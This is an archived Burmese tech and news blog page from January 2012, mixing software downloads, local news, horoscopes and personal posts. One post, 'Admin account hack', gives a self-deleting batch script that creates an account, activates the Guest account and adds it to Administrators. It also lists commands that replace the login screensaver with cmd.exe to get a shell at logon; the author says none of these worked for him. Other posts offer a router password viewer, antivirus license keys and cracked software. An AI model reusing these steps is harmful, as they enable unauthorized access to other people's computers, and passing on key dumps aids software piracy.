Member ၀င်ဖို့ ဖိတ်ခေါ်ပါတယ်ဗျာ...!!!

Thursday, January 5, 2012

WinFolder Lock Pro 1.1 - The Folder Security Solution

ကျွန်တော်အရင်က ဒီလိုကောင်မျိုးလေးတင်ပေးမလို့ပါပဲ။ မတင်ဖြစ်လိုက်တာနဲ့ ဒီကောင်လေးရဲ့ နောက်ဆုံး Update လေးကိုရှာပြီး တင်ပေးလိုက်ပါတယ်။ ဘာမှမလိုပါဘူး။ ဒီကောင်လေးကိုဖွင့်ပြီးသုံးရင်ရပါပြီ။ ဒါပေမယ့် တစ်ချက်တော့သတိရမှာက ကျွန်တော်တို့ ဖိုလ်ဒါလေးထဲမှာတော့ ဘာမှမကျန်ပဲ အလွတ်ဖြစ်သွားပါလိမ့်မယ်။ မဖျက်မိအောင်တော့ သထိထားရမှာပေါ့ဗျာ။ သုံးကြည့်ချင်တယ် ဆိုရင်တော့ အောက်မှာ ယူထားလိုက်ပါဗျာ။ ဖိုင်ဆိုဒ်ကတော့ 1MB ပဲရှိပါတယ်။

Picasa v3.9.0 Build 135.81

ကျွန်တော်တို့ Picasa သုံးနေတဲ့ Picasa ချစ်သူများအတွက် နောက်ဆုံးထပ်ထွက်လာတဲ့ Update လေးတစ်ခုဖြစ်ပါတယ်။ ဒီကောင်လေးကို ကျွန်တော် Portable လေးပါ တွဲပြီးတင်ပေးထားပါတယ်။  ကျွန်တော်တို့ Pictures လေးတွေကို View တစ်မျိုးအနေနဲ့ မြင်တွေ့ရမှာဖြစ်ပါတယ်။ သုံးနေတဲ့သူများကတော့ သိကြပါတယ်။ နောက်ဆုံး Update လေးဖြစ်လာတာနဲ့ သူ့မှာ ပါဝင်လာတဲ့ Function လေးတွေ ပိုပြီးစုံလင်လာတာကို တွေ့ရပါလိမ့်မယ်။ ဖိုင်ဆိုဒ်ကတော့ Portable လေးက 23 MB ဖြစ်ပြီး ရိုးရိုး ကတော့ 14 MB ဖြစ်ပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ။

အကြွေးဝယ်ကတ်ပြား အရွယ်သာရှိသော အငယ်စား ကွန်ပျူတာတစ်မျိုး ထွက်ရှိလာတော့မည်

By Pyi Myanmar
Photo
အငယ်စား မိုဘိုင်းအင်တာနက် ပစ္စည်းများ ထုတ်လုပ်ရာတွင် နာမည်ရထားသည့် Raspberry Pi ဖောင်ဒေးရှင်းသည် ၂၀၁၂ ခုနှစ်၊ ဇန်နဝါရီလတွင် အကြွေးဝယ်ကတ်ပြား အရွယ်သာရှိသည့်  အငယ်စား ကွန်ပျူတာတစ်မျိုးကို ဈေးကွက်တင် ရောင်းချတော့မည် ဖြစ်ကြောင်း သိရသည်။

သွားလာလည်ပတ်ရန် အကောင်းဆုံး ကမ္ဘာ့နံပါတ် (၃) နေရာအဖြစ် မြန်မာနိုင်ငံကို CNN ဖော်ပြ

Photo

By The Voice Weekly

အမေရိကန် ပြည်ထောင်စု အတ္တလန်တာမြို့ အခြေစိုက် ကမ္ဘာကျော် ရုပ်/သံ သတင်းဌာန CNN က မြန်မာနိုင်ငံကို လာမည့် ၂၀၁၂ ခုနှစ်တွင် ခရီးသွားများ သွားလာလည်ပတ်ရန် အကောင်းဆုံး နေရာ ကိုးခုအနက် နံပါတ် (၃) အဆင့်အဖြစ်  ဒီဇင်ဘာလ ၂၈ ရက်နေ့က ထည့်သွင်း ဖော်ပြလိုက်သည်။ CNN က မြန်မာနိုင်ငံကို ယင်းကဲ့သို့ ထည့်သွင်း ဆုံးဖြတ်ရာတွင် Lonely Planet အပါအဝင် ကမ္ဘာကျော် ခရီးသွား လုပ်ငန်းဆိုင်ရာ ကျွမ်းကျင်သူ လေးဦးထံမှ ကိုယ်တွေ့ သွားလာမှု ထောက်ခံချက်များမှ ရယူ ဖော်ပြခဲ့ခြင်း ဖြစ်သည်ဟုလည်း ယင်းသတင်းတွင် ဖော်ပြပါရှိသည်။

Wednesday, January 4, 2012

# 2012 ခုနှစ် (နှစ်သစ်ကူး) ၁၂ရာသီခွင်ဟောကိန်းများ

.
နှစ်ဟောင်းကုန်လို့ နှစ်သစ်တစ်ခုတော့ ပြောင်းပြန်ပြီပေါ့။ Happy New Year !!! ဆိုတဲ့ ပျော်ရွှင်စွာ အော်ဟစ်ကြတဲ့ အသံတွေလည်း သောသောညံ ခဲ့ပါပြီ။ 2012 ခုနှစ်ကို လူတော်တော်များများက ကံမကောင်းတဲ့ နှစ်တစ်နှစ် ဖြစ်လိမ့်လို့ ပြောဆိုနေကြတဲ့ အသံတွေကတော့ နေရာတိုင်းလိုလိုမှာ ကြားနေ ရပါတယ်။ ဒီနှစ်ဟာ လူသားတွေရဲ့ စိတ်ထဲမှာ ဟုတ်မှဟုတ်ပါ့မလားဆိုတဲ့ စိုးရိမ်စိတ်တွေ များနေတဲ့ နှစ်လည်း ဖြစ်ပါတယ်။ (၂၀၁၂မှာ ကမ္ဘာပျက်လိမ့်မယ်ဆိုတဲ့ ကောလာဟလရဲ့ အကျိုးသက်ရောက်မှုကြောင့် ဖြစ်ပါတယ်) ဒါပေမယ့် ကောင်းသည်ဖြစ်စေ ၊ မကောင်းသည်ဖြစ်စေ ပျော်ရွှင်စွာ ကြိုဆိုကြဖို့ကတော့ ကမ္ဘာသူကမ္ဘာသား တွေရဲ့ တာဝန်ဘဲ မဟုတ်လားဗျာ။
ကျွန်တော့်အနေနဲ့ ကိုယ့်ရဲ့ စာဖတ်ပရိသတ်ကြီးအတွက် 2012 ခုနှစ်အတွက် (၁၂)ရာသီခွင် ဟောကိန်းများကို ရေးနေဆဲဖြစ်ပါတယ်။ ဒါပေမယ့် မပြီးသေးပါဘူး။ ဒီတော့ ကျွန်တော် ဒီလိုလုပ်လိုက်တယ်။ မိဿ ၊ ပြိဿ . . . အစရှိတဲ့ (၁၂)ရာသီခွင်တွေမှာ မွေးဖွားလာကြတဲ့ ညီအစ်ကိုမောင်နှမများအတွက် “နှစ်သစ်ကူးအကြို (၁၂)ရာသီခွင် ဟောကိန်း “အကျဉ်းချုပ်” ကလေးကို ပဏာမ (အမြည်းသဘော)အနေနဲ့ တင်ဆက် ပေးလိုက်ပါတယ်။ နောက်ထပ် ရာသီတစ်ခုခြင်းစီရဲ့ “အသေးစိတ်ဟောကိန်းများ” ကိုတော့ ဇန်န၀ါရီလထဲမှာ အပြီးတင်ပေး သွားမယ် လို့ စိတ်ကူးလိုက်တယ်။
သဘောကျကြရဲ့လားဗျာ။ မကျရင်လည်း သည်းခံပြီးသာ ဖတ်ကြပေတော့။ လုံးလုံး တင်မပေးတာထက် စာရင်တော့ အများကြီး ကောင်းလိမ့်မယ် မဟုတ်လားဗျာ။ ကဲ – 2012 ရဲ့ ကံဇာတာ အကျဉ်းချုပ်ကလေးတွေကို ဖတ်ကြည့်ကြရအောင်လား။
.

(၂၇၇)ကြိမ်မြောက် ထီဖွင့်ပွဲမှ စ၍ အထူးဆုကြီးအဖြစ် ကျပ်သိန်း ၁၅၀၀ ဖွင့်လှစ်ပေးမည်

ဖေဖော်ဝါရီ ၁ ရက်တွင် ဖွင့်လှစ်မည့် (၂၇၇)ကြိမ်မြောက် ထီဖွင့်ပွဲမှ စ၍ အထူးဆုကြီးအဖြစ် ကျပ်သိန်း ၁၅၀၀ ဖွင့်လှစ်ပေးမည်ဖြစ်ကြောင်း ယနေ့ထုတ် နိုင်ငံပိုင် သတင်းစာများတွင် ဖော်ပြထားသည်။ အထူးဆုအဖြစ် ကျပ်သိန်း ၁၅၀၀ တစ်ဆု ချီးမြှင့်မည်ဖြစ်သော်လည်း၊ ကျပ်သိန်း ၁၀၀၀ ဆုတစ်ဆုမှာလည်း ဆက်လက် ရှိမည်ဖြစ်သည်။ ထို့နောက်တွင် ကျပ်သိန်း ၅၀၀ တစ်ဆု၊ ကျပ်သိန်း ၃၀၀ နှစ်ဆု၊ ကျပ်သိန်း ၂၀၀ လေးဆု စသဖြင့် ဆုမဲပေါင်း ၁၆၁၉၃ ဆုချီးမြှင့်သွားမည်ဖြစ်ကြောင်း ဖော်ပြထားသည်။
7Day News Journal

Admin account hack မလား။

 http://hackmephreak.files.wordpress.com/2011/07/wordpress-website-hacked-by-hackers-0.jpg


echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0 

ကို Notepad မှာ copy/ paste လုပ်ပြီး
Guest2admin.bat လို့ save လုပ်ပြီး။ ပြန်ဖွင့်ကြည့်ပါ password ပေါ်လာမယ်။


OR
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit
 OR


Run- cmd- cd\windows\system32-net user-account user name * -
enter your password- reenter your password- exit.


အထက်ပါသုံးမျိုးပေါ့နော်. ကျွန်တော်ရှာတွေ့တာ...ဒီနည်းလမ်းတွေကိုဘဲ ဘာလို့ပြောလဲဆိုတော့
အကုန်အကျများဘဲ လွယ်လို့ပါ။ တချို့နည်းလမ်းတွေရှိတယ်.ဒါတွေက software လို့တယ်။
cd လို့တယ်.ပြီး Computer ကိုပိတ်လိုက်ဖွင့်လိုက်နဲ့ ရှုပ်တယ်။
ကျွန်တော် အထင်တော့ အပေါ်က နည်းလမ်း (၃)မျိုးအလုပ်လုပ်ရင်လဲလုပ်မယ်။
မလုပ်ရင်လဲ မလုပ်နိုင်ဘူး..ကျွန်တော်စမ်းတာတော့ (၃)မျိုးလုံးမရဘူး။ ဒါပေမဲ့ 
မိတ်ဆွေ ကွန်ပျုတာမှာတော့ အလုပ်လုပ်ရင်လုပ်မှာပေါ့။ စမ်းသပ်ကြည့်ပေါ့။

Rounter တွေရဲ့ Password ကိုသိချင်လား....


ကဲ.....ဒီတစ်ခေါက်လည်း hack နည်းလေးတစ်ခုကို တင်ပေးလိုက်တယ်ဗျာ.နာမည်လေးကတော့ ကြားကြားချင်း ကျွန်တော်လည်း စိတ်ဝင်စားမိသွားတယ်. Rounter Password Viewer တဲ့.ကျွန်တော်တို့လို့ Wifi သုံးနေတဲ့သူတွေအတွက်တော့ တော်တော်လေးကို အသုံးဝင်ပါတယ်.ကဲ လိုချင်တဲ့သူတွေ ယူသွားလိုက်ပါဗျာ.ရှည်ရှည်ဝေးဝေး ကျွန်တော်လည်း ပြောမနေတာ့ပါဘူးဗျာ.ဆိုက်ဒ်ကတော့ တော်တော်လေးသေးသလောက် အစွမ်းထက်ပါတယ်.1MB တောင်မရှိဘူးဗျာ.

Download လုပ်ရန် လင့်များ

http://ifile.it/w38ix2s

အားလုံးကိုကျေးဇူးတင်လျက်........
ရွှေမန်းသားလေး ဝေယံ (နည်းပညာ)

Tuesday, January 3, 2012

koobits - Download, Manage And Sync Your eBooks

ကျွန်တော်အရင်ကတစ်ခုတင်ပေးခဲ့ဘူးတယ်ဗျ။ အရင်တုန်းကတော့ Goo reader လေးပါ။ ဒီတစ်ခါကတော့ koobits လေးဖြစ်ပါတယ်။ ကျွန်တော်တို့ စာအုပ်ရှာရတာလည်း လွယ်သလို Free ပေးတဲ့စာအုပ်လေးတွေ နဲ့ တခြား ရောင်းတဲ့စာအုပ်လေးတွေဆိုပြီး ရှာထုတ်ပေးပါလိမ့်မယ်။ ပြီးရင်တော့ ကျွန်တော်တို့ Free  E-book  ထဲကိုလည်းယူထားပြီး Click ပေးရုံနဲ့ Download လုပ်ပေးပါလိမ့်မယ်။ သုံးရတာတော်တော်လေးလဲ အဆင်ပြေသလို တော်တော်လေးလဲ ကောင်းပါတယ်။ ကျွန်တော့်မိတ်ဆွေတွေအတွက်လည်း အဆင်ပြေအောင် တင်ပေးလိုက်တာပါ။ ဖိုင်ဆိုဒ်ကတော့ 13.6 MB ရှိပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ။

မန္တလေးအိုးဘို အကျဉ်းထောင်မှ လွတ်မြောက်လာသူများစာရင်း

တတိယ အကြိမ်မြောက် လွတ်ငြိမ်းချမ်းသာခွင့်အရ မန္တလေးအိုးဘို အကျဉ်းထောင်မှ လွတ်မြောက်လာသူများထဲတွင် NLD ပါတီဝင် တစ်ဦးတစ်ယောက်မျှ မပါဝင်ဘဲ ပုဒ်မ ၁၉/စ နှင့် ၅/၃ အရ ထောင်ဒဏ် ၁၀ နှစ် ကျခံနေရသော ကယန်း ပြည်သစ်ပါတီ တွဲဖက်အထွေထွေ အတွင်းရေးမှူး ဦးဌေးအောင် အပါအ ၀င် ၁၀ ဦးသာ လွတ်မြောက်လာကြောင်း သိရှိရသည်။
မန္တလေးအိုးဘို အကျဉ်းထောင် မှ နံနက် ၁၁ နာရီ ၁၀ မိနစ်တွင် အမျိုးသမီး ၆၉ ဦး၊ မွန်းလွဲ ၂ နာရီ ၇ မိနစ်တွင် အမျိုးသား ၄၃ ဦး လွတ်မြောက်လာကြောင်း သိရ ပြီး ဆက်လက် လွှတ်ပေးသွားဦးမည်ဟုလည်း စုံစမ်းသိရှိရသည်။

PhotoInstrument 5.4.545 Multilingual

အစ်ကိုတို့ရေ ကျွန်တော်လည်း Connection အခက်အခဲကြောင့်ရော တခြားအခက် အခဲကြောင့်ရော နောက်ကျသွားခဲ့တာ အဆင်မပြေတာဖြစ်ခဲ့ရင် တောင်းပန်ပါတယ်ခင်ဗျာ။ ကျွန်တော်အရင်ကလည်း ဒီ PhotoInstrument လေးတွေတင်ပေးခဲ့ပြီးပါပြီ။ ဒါပေမယ့် Key error ကြောင့်အခက်အခဲ ဖြစ်နေသူများလည်းရှိတာကြောင့် အခု နောက်ထပ် နောက်ဆုံးထပ်ထွက်လာတဲ့ Update လေးကို တင်ပေးလိုက်တာပါ။ ဖိုင်ဆိုဒ်ကတော့ 3.64 MB ရှိပါတယ်။ အထဲမှာသူ့အတွက် Key လေးပါပါဝင်ပါတယ်။
ကျွန်တော်အောက်မှာ နှစ်နေရာခွဲတင်ပေးထား ပါတယ်။အဆင်ပြေမယ့်လင့်ခ်လေး ကနေသာ ယူသွားလိုက်ပါဗျာ။

Notifications ထည့်လိုသူများအတွက်



ကျွန်တော်တို့ ဒါလေးကို သိပြီးသားလဲဖြစ်မှာပါ ။ မသိသေးတဲ့သူတွေလည်း တစ်ခါတည်း သိသွားရအောင် ရေးပေးလိုက်တာပါ။ ကျွန်တော်တို့ ထွေထွေထူးထူးတော့လုပ်စရာမလိုပါဘူး။ Firefox လေးမှာ Addons လေးထည့်ပေးလိုက်တာပါ။ ကျွန်တော်တို့ မေးလ်ဖွင့်ထားမယ်ဆိုရင် ဖွင့်ထားတဲ့ မေးလ်ရဲ့ Notifications  လေးတက်ပါလိမ့်မယ်။ Facebook ဖွင့်ထားမယ်ဆိုရင်တော့ Facebook Notifications  လေးတက်ပါလိမ့်မယ်။ အောက်မှာဆက်ကြည့်လိုက်ပါဗျာ။

Keys for NORTON,Kaspersky,Dr. Web,ESET NOD32,Avast,Avira 27 DEC 2011


အခုတစ်လော Avira နဲ့ တခြား keys လေးတွေ များနေတာနဲ့ ကျွန်တော်တင်ပေးလိုက်တာပါ။ အားလုံးပေါင်း Antivirus နဲ့ Internet Security လေးတွေအတွက် Keys လေးတွေ ပါဝင်ပါတယ်။ ဖိုင်ဆိုဒ်ကတော့ 8 MB ရှိပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ။
ကျွန်တော်အောက်မှာ သုံးနေရာခွဲတင်ပေးထားပါတယ်။ အဆင်ပြေမယ့်လင့်ခ် လေးကနေသာ ယူသွားလိုက်ပါဗျာ။

Monday, January 2, 2012

၆၄ နှစ်မြောက် လွတ်လပ်ရေးနေ့အား ကြိုဆိုဂုဏ်ပြုသောအားဖြင့် အမိန်ကြေငြာစာအမှတ် ၂/၂၀၁၂

လွတ်ငြိမ်းချမ်းသာခွင့်အရ
- သေဒဏ်ကျခံရသူများအား ထောင်ဒဏ်တစ်သက် (နှစ်အကန့်အသက်မရှိ)၊
- နှစ် ၃၀ အထက် ကျခံနေရသူများ (နှစ်အကန့်အသတ်မရှိနှင့် ထောင်ဒဏ်တစ်သက်မပါ) အား နှစ် ၃၀၊
- နှစ် ၂၀ မှ နှစ် ၃၀ အထိ ကျခံနေရသူများအား နှစ် ၂၀၊
- နှစ် ၂၀ အောက် ကျခံနေရသူများအား ယင်းတို့ ကျခံနေရသည့် ထောင်ဒဏ်၏ လေးပုံတစ်ပုံကို လွတ်ငြိမ်းချမ်းသာခွင့်ပြုသည်။

ပုံ
သိန်းစိန်
နိုင်ငံတော် သမ္မတ၊ ပြည်ထောင်စုသမ္မတ မြန်မာနိုင်ငံတော်

နှစ်ဘက်မိဘ - အလိုကျ

ကျွန်တော်က မြန်မာပြည်သား ပီသစွာနဲ့ ကိုရိးယားကားတွေကို တော်တော်လေး နှစ်သက်စွဲလန်းပါတယ်။ အရမ်းလည်း ကြိုက်ပါတယ်။ တစ်ချို့တွေကတော့ ကိုရီးယားကားတွေကို ကြိုက်တာကို မကောင်းမြင် အဖြစ်ပြောကြပါတယ်။ ဘယ်သူတွေ ဘယ်လို ပြောပြော ကျွန်တော်ကတော့ ကြိုက်မြဲ ကြည့်မြဲ နျစ်သက်မြဲပါ။ မှတ်မှတ်ရရ ပြီးခဲ့တဲ့ နှစ်တုန်းက ကျွန်တော်တို့ ကော့သောင်းမှာ ပတ်စပို့ သွား ရိုက်ဖြစ်တယ်။ ပြန်လာတော့ ကျွန်တော် ဘာတွေ ၀ယ်လာဖြစ်တယ် ထင်လဲ။ ကိုရီးယား မြန်မာစာတမ်းထိုး ဇာတ်လမ်းတွေ တော်တော်များများ ၀ယ်လာဖြစ်ပါတယ်။ ဒီဗီဒီအခွေတွေပါ။ မှတ်မှတ်ရရ အနှိုင်းမဲ့ သစ္စာရှင်တို့၊ ဂျူမုံတို့၊ နတ်သမီးနဲ့ လူလိမ်တို့၊ သမားတော်တို့ တော်တော်လေးများပါတယ်။

Instant Photo Sketch Pro 2.0


ဒါလေးကတော့ သိပ်တော့ ထွေထွေထူးထူးမရှိပါဘူး။ ဒီပုံစံလေးဖြစ်အောင် လုပ်တာလေးပါပဲ။

Sunset River Screensaver (+ Animated Wallpaper)


ကျွန်တော်အရင်က တင်ပေးခဲ့သလိုပါပဲ၊ ဒီကောင်လေးကတော့ Sunset River Screensaver လေးပါ။ သူနဲ့ အတွက် Animated Wallpaper Pack လေးပါတင်ပေးထားပါတယ်။ 3D Animation Background လေးပါပဲ။ အဆင်ပြေပါတယ်။ ဖိုင်ဆိုဒ်ကတော့ 27.53 MB ရှိပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ..
ကျွန်တော်အောက်မှာ နှစ်နေရာခွဲတင်ပေးထားပါတယ်။ အဆင်ပြေမယ့်လင့်ခ် လေးနေသာ ယူသွားလိုက်ပါ ဗျာ..

Christmas Eve 3D Screensaver v1.0

ကျွန်တော်အခု Christmas 3D Screensaver လေးတစ်ခုတင်ပေးလိုက်ပါတယ်။ နောက်ခံ Animation လေးတွေအပြင် သူနဲ့လိုက်ဖက်တဲ့ တီးလုံးသံလေးတွေကိုပါထည့်သွင်းပေး ထားတဲ့ အတွက် အဆင်ပြေပါတယ်။ ဖိုင်ဆိုဒ်ကလည်း 11.22 MB ပဲရှိပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ။
ကျွန်တော်အောက်မှာ နှစ်နေရာခွဲတင်ပေထား ပါတယ်။ အဆင်ပြေမယ့်လင့်ခ် လေးကနေသာ ယူသွားလိုက်ပါဗျာ။

Winter 3D Screensaver 1.0


ကျွန်တော်အခု Screen saver လေးတစ်ခုတင်ပေးလိုက်ပါတယ်။ နောက်ခံ Animation လေးတွေ လှုပ်ရှားမှုတွေနဲ့ အတူ နောက်ခံ သီချင်းသံလေးပါတွဲပြီးပါဝင်ပါတယ်။ Registry ဖိုင်လေးပါ ထည့်ပေးထား တဲ့ အတွက် Full Version သုံးလို့ရပါတယ်။ အခုကောင်လေးဖိုင်ဆိုဒ်ကတော့ 4.5 MB ပဲရှိပါတယ်။ အောက်မှာ ယူသွားလိုက်ပါဗျာ...

Wireless AV Transmitter & Reciever

By Internet Journal
Photo
အရုပ်နှင့်အသံ နှစ်မျိုးစလုံးကို Wireless စနစ်ဖြင့် ထုတ်လွှင့်ပေးနိုင်သည့် Transmitter နှင့် ပြန်လည် ဖမ်းယူပေးနိုင်သည့် Reciever ဈေးကွက်အတွင်း ဝယ်ယူနိုင်ပြီ ဖြစ်ပါတယ်။

ပြည်တွင်း Facebook အသုံးပြုသူ အများစုတွင် Timeline Service ကို တွင်ကျယ်စွာ အသုံးပြုမှု နည်းသေး

ကမ္ဘာပေါ်ရှိ လူသန်းပေါင်း ၈၀၀ ကျော် အသုံးပြုလျက်ရှိသော Social လူမှုရေး website တစ်ခုဖြစ်သော facebook မှ မကြာသေးခင် အချိန်မှ စတင်ကာ Timeline ဝန်ဆောင်မှုကို facebook အသုံးပြုသူ အားလုံးအတွက်  စတင်ဝန်ဆောင်မှု ပေးလိုက်ပြီ ဖြစ်သော်လည်း ပြည်တွင်းရှိ နည်းပညာ အသုံးပြုသူများ facebook အသုံးပြုမှုများကြားတွင် တွင်ကျယ်စွာ  အသုံးပြုခြင်း မရှိသေးကြောင်း စုံစမ်း သိရှိရသည်။

Sunday, January 1, 2012

နှစ်သစ်မှာ ပျော်ရွှင်ကြပါစေ......

ဘာလိုလိုနဲ့ 2012 ကိုတောင်ရောက်လာခဲ့ပြီ မိတ်ဆွေတို့ရေ.မနေ့ညကတော့ မန်းလေးမှာ တော်တော်လေးကို ဆူညံပွက်လော ရိုက်နေတာဘဲဗျာ.ကျွန်တော်တောင် တော်တော်နဲ့ မအိပ်ရဘူး.ကျွန်တော် နှစ်သစ်မှာ မိတ်ဆွေတို့ကို ကျွန်တော် ဆုတောင်းပေးချင်တာက


"ပျော်ပျော်ရွှင်ရွှင်နဲ့ 2012 မှာ အောင်မြင်မှုတွေ ရရှိပြီး သာယာပျော်ရွှင်သောဘ၀ကိုယ်စီ ပိုင်ဆိုင်ကြပါစေ"


လို့ ဆုမွန်ကောင်းတောင်းလိုက်ပါတယ်ဗျာ....

ဒီနေ့တော့ ကျွန်တော် Post မရေးဖြစ်တဲ့အတွက် နားလည်ပေးကြပါ.....
အားလုံးကို ကျေးဇူးတင်ရှိလျက်.....
ရွှေမန်းသားလေး ဝေယံ(နည်းပညာ)

Saturday, December 31, 2011

၃ သိန်းဝန်းကျင် ဖုန်းများတွင် နည်းပညာပိုင်း မြင့်မားသော စက်များကို အသုံးပြုထား



Photo

မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းနှင့် ပုဂ္ဂလိက ကုမ္ပဏီများ ပူးပေါင်း၍ အကောင်အထည် ဖော်ဆောင်လျက် ရှိသော ငွေကျပ် ၃ သိန်း ဝန်းကျင်ခန့်ဖြင့်  ချထားပေးမည့် GSM ဖုန်းများတွင် နည်းပညာပိုင်းအရ အဆင့်မြင့်သော စက်ပစ္စည်းများကို အသုံးပြုထားကြောင်း မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှ တာဝန်ရှိသူ တစ်ဦးက ပြောကြားခဲ့သည်။ စက်ပစ္စည်းများ တပ်ဆင်ထားမှုနှင့် ပတ်သက်ပြီး အထက်ပါ ပုဂ္ဂိုလ်က “စက်ပစ္စည်းတွေက နောက်ဆုံးထုတ် နည်းပညာတွေကို သုံးထားတဲ့အတွက် ယခင်သုံးထားတဲ့ စက်တွေထက် ဆက်သွယ်မှုဆိုင်ရာတွေမှာ ပိုမို ကောင်းမွန်လာမှာ ဖြစ်သလို လိုင်းဆွဲအားကအစ လိုင်းကြည်လင်မှုတွေ အားလုံးက ယခု GSM တွေထက်သာမှာပါ။ ဒါကလည်း ယခင်သုံးထားတဲ့ ဆက်သွယ်ရေး နည်းပညာဆိုင်ရာ စက်တွေထက် ယခုဆင်ထားတဲ့ စက်တွေက ပိုပြီး ခေတ်မီတဲ့အတွက်ကြောင့်ပါ။ သီးသန့်အနေနဲ့တော့ ဆင်တာမျိုး မဟုတ်ပါဘူး” ဟု ရှင်းပြခဲ့သည်။
 
အဆိုပါ စက်ပစ္စည်းများ တပ်ဆင်ခြင်းများကြောင့် လိုင်းဆွဲအား အပါအဝင် အင်တာနက်လိုင်းများပါ ပိုမို ကောင်းမွန်လာနိုင်ကြောင်းလည်း သိရသည်။ ထို့အပြင် လာမည့် လအနည်းငယ်အတွင်း ချထားပေးမည့် တန်ဖိုးနည်းဖုန်းများနှင့် ပတ်သက်၍ တရားဝင်ဈေးနှုန်း သတ်မှတ်ချက်များအတွက် သေးသော်လည်း ငွေကျပ် ၃ သိန်း မကျော်သော နှုန်းထားဖြင့် ချထားနိုင်ရန် ရှိကြောင်းကိုတော့ မြန်မာ့ဆက်သွယ်ရေးလုပ်ငန်း အသိုင်းအဝိုင်းက ပြောကြားချက်များအရ  ပြည်သူများလည်း သိရှိပြီးဖြစ်မှာ ဖြစ်ကြောင်း အင်တာနက်စနစ်ကိုလည်း တစ်ပြိုင်နက် ပါရှိပြီးသား ဖြစ်နိုင်စေရန်အတွက် စီစဉ်လျက်ရှိကြောင်း တို့ကိုလည်း ထပ်မံဖြည့်စွက် ပြောကြားခဲ့ကြောင်း သိရသည်။

MSK

CDMA 800 MHz အတွက် ပထမဆုံး 8 Megapixel ကင်မရာဖုန်း ဝင်ရောက်လာ



Photo
CDMA 800 MHz စနစ် အသုံးပြုသူများအတွက် CPU စနစ်နှင့် ကင်မရာစနစ် မြင့်မားကောင်းမွန်သော ဖုန်းအမျိုးအစားသစ်တစ်ခု ဈေးကွက် ဝင်ရောက်လာခဲ့ကြောင်း  သိရသည်။ အဆိုပါဖုန်းမှာ Motorola Driod X ME811 ဖြစ်ပြီး ပြည်တွင်းသို့ ဝင်ရောက်လာခဲ့သော CDMA 800 MHz စနစ် အသုံးပြု ဟန်းဆက်များထဲတွင် ကင်မရာစနစ် အမြင့်မားဆုံးနှင့် CPU စနစ် မြင့်မားသော ဖုန်းတစ်လုံးဖြစ်ကြောင်း သိရသည်။

မိမိအမည်ကိုအောင်မြင် ၊ ကျော်ကြား ၊ ထင်ပေါ်အောင် ယတြာစီရင်မယ်



အခု ယတြာနည်းတစ်ခု ပြောပြလိုက်ပါတယ်။ ဘာလဲဆိုတော့ လူတစ်ယောက်ဟာ ကိုယ့်နာမည်ကို သိရုံနဲ့ကံဇာတာေ ကာင်းအောင် တိုးတက်အောင် ပွင့်လန်းအောင် ယတြာချေလို့ ရတဲ့ နည်းလေးတစ်ခုကို တင်ပေးလိုက်ပါတယ်။ ဘာနေ့သား ဘယ်နေ့သမီး သိစရာမလိုပါဘူး။ ဘယ်ခုနှစ်မှာ မွေးဖွားတယ် အင်္ဂလိပ် မွေးသက္ကရာဇ်က ဘယ်နှစ်ရက်နေ့ ဘယ်လ ဘယ်ခုနှစ်နှစ် ဆိုတာကို မမှတ်မိရင်လည်း ပြဿနာ မရှိပါဘူး။ ကိုယ့်နာမည်ရဲ့ အရင်းလုံးကို သိယုံနဲ့ ဒီယတြာနည်းကို ဆောင်ရွက်လို့ ရပါတယ်။

Related Posts Plugin for WordPress, Blogger...

My Account